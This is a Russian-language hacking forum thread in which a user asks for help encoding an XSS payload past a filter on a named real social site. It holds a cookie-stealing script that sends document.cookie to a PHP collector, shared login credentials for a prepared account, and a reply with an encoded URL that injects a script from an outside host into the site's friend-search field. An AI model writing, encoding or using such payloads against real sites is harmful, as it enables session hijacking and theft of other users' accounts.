|
xss шифровка
помогите вставить скрипт
--><script>document.write(String.fromCharCode(<scrip t>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">") ;</script>));</script><!-- и обойти фильтр :( Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу |
Цитата:
|
в программе inetcrack http://old.antichat.ru/inetcrack/можно перевести
|
http://old.antichat.ru/crackchat/HTML/
кури. |
я честно не могу разобратся в чём дело но ко мне доходит только: " escape(document.cookie) "
по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает. P.S. большое спасибо за отзывчевость |
Цитата:
|
я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[
эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=тут) помогите подходяще закодировать :( пробовал кодировать весь урл, всё равно не работает... Пожалуйста :( для меня это вопрос сложный, уже 2 день парюсь |
пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\
|
ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx password: antichat кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: " " |
http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E
|
| Время: 05:16 |